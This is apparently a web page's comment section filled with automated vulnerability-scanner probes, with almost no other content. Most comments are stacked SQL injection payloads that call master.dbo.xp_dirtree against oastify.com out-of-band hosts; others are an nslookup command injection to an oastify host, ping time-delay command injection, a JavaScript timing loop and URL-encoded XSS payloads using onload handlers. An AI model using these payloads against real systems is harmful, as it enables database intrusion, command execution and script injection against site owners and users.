    45. Comment*xmzzl%3ca%20xmlns%3aa%3d%22http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%22%3e%3ca%3abody%20onload%3d%22confirm%281%29%22%2f%3e%3c%2fa%3er0wme

    46. Comment*;declare @q varchar(99);set @q=’\\ise7p3rh3ivscbbyb570njsi1973v3srjh79uzio.oasti’+’fy.com\htc’; exec master.dbo.xp_dirtree @q;–

    47. Comment*’;declare @q varchar(99);set @q=’\\uvtjsfut6uy4fneaehacqvvu4lafyfv3muamxcl1.oasti’+’fy.com\lor’; exec master.dbo.xp_dirtree @q;–

    48. Comment*);declare @q varchar(99);set @q=’\\lodal6nkzlrv8e717833jmolxc36r6oufm3eq4et.oasti’+’fy.com\poj’; exec master.dbo.xp_dirtree @q;–

    49. Comment*’);declare @q varchar(99);set @q=’\\ehz3ezgdseko170u01wwcfheq5wzkzhn8gw8jy7n.oasti’+’fy.com\aya’; exec master.dbo.xp_dirtree @q;–

    50. Comment*;declare @q varchar(99);set @q=’\\lc1a96bknlfvwev1v8r37mcllcr6f6cu3krce22r.oasti’+’fy.com\hzi’; exec master.dbo.xp_dirtree @q;–

    51. Comment*’;declare @q varchar(99);set @q=’\\b9l06w8akbclt4srsyot4c9bi2owcw9k0bo3btzi.oasti’+’fy.com\yrj’; exec master.dbo.xp_dirtree @q;–

    52. Comment*);declare @q varchar(99);set @q=’\\ftc4q0se4fwpd8cvc28xogtf2680w0tokg88vyjn.oasti’+’fy.com\gge’; exec master.dbo.xp_dirtree @q;–

    53. Comment*’);declare @q varchar(99);set @q=’\\t60i3e5sht93qmp9pglb1u6tfkle9e62xvln8dw2.oasti’+’fy.com\nzq’; exec master.dbo.xp_dirtree @q;–

    54. Comment*;declare @q varchar(99);set @q=’\\6ahv7r95l6dguztmttpo57a6jxprdraf15pxcn0c.oasti’+’fy.com\lwm’; exec master.dbo.xp_dirtree @q;–

    55. Comment*’;declare @q varchar(99);set @q=’\\szvhwdyras22jli8ifeautzs8jed2dz1qsek1apz.oasti’+’fy.com\xyf’; exec master.dbo.xp_dirtree @q;–

    56. Comment*);declare @q varchar(99);set @q=’\\l4qa163kfl7voen1n8j3zm4ldcj6764uvmje64ut.oasti’+’fy.com\plf’; exec master.dbo.xp_dirtree @q;–

    57. Comment*’);declare @q varchar(99);set @q=’\\q5wf2b4pgq80pjo6odk80r5qehkb8b5zwskk7avz.oasti’+’fy.com\gve’; exec master.dbo.xp_dirtree @q;–

    58. Comment*;declare @q varchar(99);set @q=’\\uomjlfntzur48n7a7h3cjvouxl3frfo3ft3lqbe0.oasti’+’fy.com\sfv’; exec master.dbo.xp_dirtree @q;–

    59. Comment*’;declare @q varchar(99);set @q=’\\7muwjsl6x7ph605n5u1ph8m7vy1spsmgd71zopce.oasti’+’fy.com\shy’; exec master.dbo.xp_dirtree @q;–

    60. Comment*);declare @q varchar(99);set @q=’\\2psrmno102sc9v8i8p4kk3p2yt4nsnpbg34vrlfa.oasti’+’fy.com\nqs’; exec master.dbo.xp_dirtree @q;–

    61. Comment*’);declare @q varchar(99);set @q=’\\theieegsstk31m090gwbcuhtqkwekeh28vwnjd72.oasti’+’fy.com\tpp’; exec master.dbo.xp_dirtree @q;–

    62. Comment*;declare @q varchar(99);set @q=’\\9eoybud8p9hjy2xpxwtr9ae9n0tuhuei58t0gq4f.oasti’+’fy.com\vbr’; exec master.dbo.xp_dirtree @q;–

    63. Comment*’;declare @q varchar(99);set @q=’\\itf7q3sh4iwsdbcyc580ojti2983w3trki8av0jp.oasti’+’fy.com\yax’; exec master.dbo.xp_dirtree @q;–

    64. Comment*);declare @q varchar(99);set @q=’\\h6o6325ghh9rqapxp4lz1i6hf8l2926qxila80wp.oasti’+’fy.com\iap’; exec master.dbo.xp_dirtree @q;–

    65. Comment*’);declare @q varchar(99);set @q=’\\1hjqemg0s1kb1u0h0owjc2h1qswmkmha83wvjl7a.oasti’+’fy.com\psr’; exec master.dbo.xp_dirtree @q;–

    66. Comment*;declare @q varchar(99);set @q=’\\1kmqhmj0v1nb4u3h3ozjf2k1tszmnmkab0zsmia7.oasti’+’fy.com\gec’; exec master.dbo.xp_dirtree @q;–

    67. Comment*’;declare @q varchar(99);set @q=’\\mi8bf7hltmlw2f1219x4dnimrdx7l7iv9mxek48t.oasti’+’fy.com\gsr’; exec master.dbo.xp_dirtree @q;–

    68. Comment*);declare @q varchar(99);set @q=’\\1acq7m90l1dbuuthtopj52a1jspmdmaa12puck09.oasti’+’fy.com\igw’; exec master.dbo.xp_dirtree @q;–

    69. Comment*’);declare @q varchar(99);set @q=’\\0oppllnzz0ra8t7g7n3ij1o0xr3lrlo9f23uqke9.oasti’+’fy.com\hbq’; exec master.dbo.xp_dirtree @q;–

    70. Comment*;declare @q varchar(99);set @q=’\\g1i5y10fcg4ql9kwk3gywh1ga7g1411psfg73xrm.oasti’+’fy.com\uxi’; exec master.dbo.xp_dirtree @q;–

    71. Comment*’;declare @q varchar(99);set @q=’\\o0pdx9znbo3ykhj4jbf6vp0o9ff9390xrofg26qv.oasti’+’fy.com\ivr’; exec master.dbo.xp_dirtree @q;–

    72. Comment*);declare @q varchar(99);set @q=’\\hm76j2lgxhpr6a5x541zhimhv812p2mqdi1ao0cp.oasti’+’fy.com\wdc’; exec master.dbo.xp_dirtree @q;–

    73. Comment*’);declare @q varchar(99);set @q=’\\ck01hxjbvcnm453s3zzufdkct3zxnxklbez6mwal.oasti’+’fy.com\fyz’; exec master.dbo.xp_dirtree @q;–

    74. Comment*;declare @q varchar(99);set @q=’\\lb0a86akmlevveu1u8q36mblkcq6e6bu2kqcd21r.oasti’+’fy.com\yyp’; exec master.dbo.xp_dirtree @q;–

    75. Comment*’;declare @q varchar(99);set @q=’\\cm21jxlbxcpm655s5z1uhdmcv31xpxmldc14oucj.oasti’+’fy.com\qwv’; exec master.dbo.xp_dirtree @q;–

    76. Comment*);declare @q varchar(99);set @q=’\\f7n4406eifapr8qvq2mx2g7fg6m0a07oygm89yxn.oasti’+’fy.com\twl’; exec master.dbo.xp_dirtree @q;–

    77. Comment*’);declare @q varchar(99);set @q=’\\fl44i0kewfop584v420xgglfu600o0loch09nzbo.oasti’+’fy.com\ouo’; exec master.dbo.xp_dirtree @q;–

    78. Comment*;declare @q varchar(99);set @q=’\\y21nzj1xdy58mrlellhgxz2ybphj5j27txhp4fs4.oasti’+’fy.com\qiz’; exec master.dbo.xp_dirtree @q;–

    79. Comment*’;declare @q varchar(99);set @q=’\\wqqlnhpv1wt6ap9c9j5elxqwzn5hthq5hw5oseg3.oasti’+’fy.com\kdn’; exec master.dbo.xp_dirtree @q;–

    80. Comment*);declare @q varchar(99);set @q=’\\omedj9lnxopy6h545b16hpmovf19p9mxdp1ho7cw.oasti’+’fy.com\aeq’; exec master.dbo.xp_dirtree @q;–

    81. Comment*’);declare @q varchar(99);set @q=’\\m2pbz71ldm5wmfl2l9h4xn2mbdh7572vtohg46sv.oasti’+’fy.com\eje’; exec master.dbo.xp_dirtree @q;–

  1. Comment*;declare @q varchar(99);set @q=’\\syuhvdxr9s12ilh8hfdattys7jdd1d41vrjj69uy.oasti’+’fy.com\klc’; exec master.dbo.xp_dirtree @q;–

  2. Comment*’;declare @q varchar(99);set @q=’\\iug7r3th5ixsebdyd590pjui3993x30rrifa20qp.oasti’+’fy.com\mmp’; exec master.dbo.xp_dirtree @q;–

  3. Comment*);declare @q varchar(99);set @q=’\\wpplmhov0ws69p8c8j4ekxpwyn4hshv5mxapxfl4.oasti’+’fy.com\nam’; exec master.dbo.xp_dirtree @q;–

  4. Comment*’);declare @q varchar(99);set @q=’\\u1wjyf0tcu44lnkakhgcwv1ualgf4f73ywmo9ex3.oasti’+’fy.com\hpv’; exec master.dbo.xp_dirtree @q;–

  5. Comment*&nslookup -q=cname sgchddfrrsj20lz8zfvabtgspjvdjdm1hp9cz0o.oastify.com.&’\”`0&nslookup -q=cname sgchddfrrsj20lz8zfvabtgspjvdjdm1hp9cz0o.oastify.com.&`’

  6. Comment*|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1

  7. Comment*’+(function(){if(typeof dxazk===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);dxazk=1;}}())+'

  8. Comment*;declare @q varchar(99);set @q=’\\nxocu8wm8n0xhgg3gac5soxn6ec8083wumie54tt.oasti’+’fy.com\brn’; exec master.dbo.xp_dirtree @q;–

  9. Comment*’;declare @q varchar(99);set @q=’\\0cdp9lbzn0fawtvgvnri71c0lrrlfli990xski87.oasti’+’fy.com\rye’; exec master.dbo.xp_dirtree @q;–

  10. Comment*);declare @q varchar(99);set @q=’\\pg9edaforpjz0iz5zcv7bqgppgvajamydq1io8cx.oasti’+’fy.com\zam’; exec master.dbo.xp_dirtree @q;–

  11. Comment*’);declare @q varchar(99);set @q=’\\i4n7133hfi7sobnyn5j0zj4id9j373ar1kpcc20r.oasti’+’fy.com\nyo’; exec master.dbo.xp_dirtree @q;–

  12. Comment*;declare @q varchar(99);set @q=’\\fm54j0lexfpp685v521xhgmfv610p0soje76uwil.oasti’+’fy.com\plj’; exec master.dbo.xp_dirtree @q;–

  13. Comment*’;declare @q varchar(99);set @q=’\\0ghpdlfzr0ja0tzgznvib1g0prvljlm9d01soic7.oasti’+’fy.com\yso’; exec master.dbo.xp_dirtree @q;–

  14. Comment*);declare @q varchar(99);set @q=’\\e6l33z5dhe9oq7pup1lw1f6ef5lz9zcn3fr7ex2m.oasti’+’fy.com\ejo’; exec master.dbo.xp_dirtree @q;–

  15. Comment*’);declare @q varchar(99);set @q=’\\koc9l5njzkru8d707732jlokxb35r5utlm9ew4kt.oasti’+’fy.com\vzi’; exec master.dbo.xp_dirtree @q;–

  16. Comment*;declare @q varchar(99);set @q=’\\9z9ywuy8a92jj2ipiweruaz980eu2u5iw8k07qvf.oasti’+’fy.com\ndl’; exec master.dbo.xp_dirtree @q;–

  17. Comment*’;declare @q varchar(99);set @q=’\\o4td193nfo7yohn4nbj6zp4odfj979ax1opgc60v.oasti’+’fy.com\oac’; exec master.dbo.xp_dirtree @q;–

  18. Comment*);declare @q varchar(99);set @q=’\\tmjijelsxtp36m595g1bhumtvk1epes2ju7muci1.oasti’+’fy.com\wlv’; exec master.dbo.xp_dirtree @q;–

  19. Comment*’);declare @q varchar(99);set @q=’\\kqe9n5pj1ktuad909752llqkzb55t5wtnmbey4mt.oasti’+’fy.com\vwf’; exec master.dbo.xp_dirtree @q;–

  20. Comment*;declare @q varchar(99);set @q=’\\9cmy9ub8n9fjw2vpvwrr7ac9l0rufuii98x0kq8f.oasti’+’fy.com\ghh’; exec master.dbo.xp_dirtree @q;–

  21. Comment*’;declare @q varchar(99);set @q=’\\pxqeuawo8p0zhig5gcc7sqxp6gca0a3yupih57tw.oasti’+’fy.com\ere’; exec master.dbo.xp_dirtree @q;–

  22. Comment*);declare @q varchar(99);set @q=’\\b5h02w4agb8lp4oroykt0c5be2kw8wbk2cq4du1j.oasti’+’fy.com\woi’; exec master.dbo.xp_dirtree @q;–

  23. Comment*’);declare @q varchar(99);set @q=’\\ehz3ezgdseko170u01wwcfheq5wzkznneg28pydn.oasti’+’fy.com\tec’; exec master.dbo.xp_dirtree @q;–

  24. Comment*;declare @q varchar(99);set @q=’\\pkdehajovpnz4i353cz7fqkptgzanaqyho5gs6gv.oasti’+’fy.com\plv’; exec master.dbo.xp_dirtree @q;–

  25. Comment*’;declare @q varchar(99);set @q=’\\o9yd698nkocyths4sbo64p9oifo9c9fx6ough65v.oasti’+’fy.com\ujz’; exec master.dbo.xp_dirtree @q;–

  26. Comment*);declare @q varchar(99);set @q=’\\4ditapc3o4gexxwkwrsm85d4mvspgpjda5yxln9c.oasti’+’fy.com\vms’; exec master.dbo.xp_dirtree @q;–

  27. Comment*’);declare @q varchar(99);set @q=’\\9y8yvux8991ji2hphwdrtay970du1u4ivbj36tui.oasti’+’fy.com\nlf’; exec master.dbo.xp_dirtree @q;–

  28. Comment*;declare @q varchar(99);set @q=’\\q6xf3b5phq90qjp6pdl81r6qfhlb9bcz3prhe72w.oasti’+’fy.com\sjn’; exec master.dbo.xp_dirtree @q;–

  29. Comment*’;declare @q varchar(99);set @q=’\\2mprjnl1x2pc6v5i5p1kh3m2vt1npnsbj27uuki9.oasti’+’fy.com\sgh’; exec master.dbo.xp_dirtree @q;–

  30. Comment*);declare @q varchar(99);set @q=’\\z55o2k4ygz89psofomkh005zeqkk8kb820qsdi17.oasti’+’fy.com\rvt’; exec master.dbo.xp_dirtree @q;–

  31. Comment*’);declare @q varchar(99);set @q=’\\sqmhndpr1st2al989f5altqszj5dtdw1nubmycm1.oasti’+’fy.com\okl’; exec master.dbo.xp_dirtree @q;–

  32. Comment*;declare @q varchar(99);set @q=’\\gsc5p1rf3gvqc9bwb37ynhsg1771v1yppfd70xom.oasti’+’fy.com\out’; exec master.dbo.xp_dirtree @q;–

  33. Comment*’;declare @q varchar(99);set @q=’\\xnomkimwyxq77q6d6k2fiynxwo2iqit6kx8pvfj4.oasti’+’fy.com\cus’; exec master.dbo.xp_dirtree @q;–

  34. Comment*);declare @q varchar(99);set @q=’\\f5l4204egf8pp8ovo2kx0g5fe6k080bo2gq8dy1n.oasti’+’fy.com\xtl’; exec master.dbo.xp_dirtree @q;–

  35. Comment*’);declare @q varchar(99);set @q=’\\q0rfxbzpbq30kjj6jdf8vr0q9hfb3b6zxslk8awz.oasti’+’fy.com\xtd’; exec master.dbo.xp_dirtree @q;–

  36. Comment*;declare @q varchar(99);set @q=’\\7ckw9sb6n7fhw0vnvurp78c7lyrsfsig96xyko8d.oasti’+’fy.com\rsc’; exec master.dbo.xp_dirtree @q;–

  37. Comment*’;declare @q varchar(99);set @q=’\\1bdq8ma0m1ebvuuhuoqj62b1ksqmemha81wtjj78.oasti’+’fy.com\qiw’; exec master.dbo.xp_dirtree @q;–

  38. Comment*);declare @q varchar(99);set @q=’\\0yzpvlxz901aithghndit1y07rdl1l49v1jt6ju8.oasti’+’fy.com\qhx’; exec master.dbo.xp_dirtree @q;–

  39. Comment*’);declare @q varchar(99);set @q=’\\ysunpjrx3yv8crbebl7gnzsy1p7jvjy7p0ds0io7.oasti’+’fy.com\rcq’; exec master.dbo.xp_dirtree @q;–

  40. Comment*;declare @q varchar(99);set @q=’\\gi25f1hftglq291w13xydhigr7x1l1opff37qxem.oasti’+’fy.com\kox’; exec master.dbo.xp_dirtree @q;–

  41. Comment*’;declare @q varchar(99);set @q=’\\132q0m20e16bnumhmoijy231csim6m9a01otbjz8.oasti’+’fy.com\jsb’; exec master.dbo.xp_dirtree @q;–

  42. Comment*);declare @q varchar(99);set @q=’\\ehz3ezgdseko170u01wwcfheq5wzkznnef27pxdm.oasti’+’fy.com\lge’; exec master.dbo.xp_dirtree @q;–

  43. Comment*’);declare @q varchar(99);set @q=’\\szvhwdyras22jli8ifeautzs8jed2d51wukm7cv1.oasti’+’fy.com\grm’; exec master.dbo.xp_dirtree @q;–

  44. Comment*;declare @q varchar(99);set @q=’\\zx0oukwy8z09hsgfgmchs0xz6qck0k38uyiq5gt5.oasti’+’fy.com\lbs’; exec master.dbo.xp_dirtree @q;–

  45. Comment*’;declare @q varchar(99);set @q=’\\gcw591bfngfqw9vwv3ry7hcgl7r1f1ip9gx8ky8n.oasti’+’fy.com\pqu’; exec master.dbo.xp_dirtree @q;–

  46. Comment*);declare @q varchar(99);set @q=’\\6ryvorq526ugbzamat6om7r60x6rurxfo7czzpne.oasti’+’fy.com\zas’; exec master.dbo.xp_dirtree @q;–

  47. Comment*’);declare @q varchar(99);set @q=’\\9lvyiuk8w9oj524p4w0rgal9u00uouriib63tthi.oasti’+’fy.com\rod’; exec master.dbo.xp_dirtree @q;–

  48. Comment*tuot0%3ca%20xmlns%3aa%3d%27http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%27%3e%3ca%3abody%20onload%3d%27alert%281%29%27%2f%3e%3c%2fa%3emzt0x

  49. Comment*vnu8p%3ca%20xmlns%3aa%3d%22http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%22%3e%3ca%3abody%20onload%3d%22alert%281%29%22%2f%3e%3c%2fa%3er7cx7

  50. Comment*;declare @q varchar(99);set @q=’\\e2h3zz1dde5om7lul1hwxf2eb5hz5z8nzdn5avyk.oasti’+’fy.com\mlb’; exec master.dbo.xp_dirtree @q;–

  51. Comment*’;declare @q varchar(99);set @q=’\\ar5zovq92aukb3aqax6smbra016vuvxjoac2zsnh.oasti’+’fy.com\jmv’; exec master.dbo.xp_dirtree @q;–

  52. Comment*);declare @q varchar(99);set @q=’\\uvtjsfut6uy4fneaehacqvvu4lafyf13svgn3dr2.oasti’+’fy.com\oxb’; exec master.dbo.xp_dirtree @q;–

  53. Comment*;declare @q varchar(99);set @q=’\\4uztrpt354xeexdkdr9mp5u43v9pxp0dr3fv2lqa.oasti’+’fy.com\yow’; exec master.dbo.xp_dirtree @q;–

  54. Comment*’;declare @q varchar(99);set @q=’\\txuiuews8t03hmg9ggcbsuxt6kce0e32util5bt0.oasti’+’fy.com\oeq’; exec master.dbo.xp_dirtree @q;–

  55. Comment*);declare @q varchar(99);set @q=’\\czf1wxybac2mj5isizeuudzc83ex2x5lwdk57vvk.oasti’+’fy.com\xhc’; exec master.dbo.xp_dirtree @q;–

  56. Comment*’);declare @q varchar(99);set @q=’\\rc7g9cbqnrf1wkv7ver97scrlircfci09txlkb80.oasti’+’fy.com\jzu’; exec master.dbo.xp_dirtree @q;–

Leave a Reply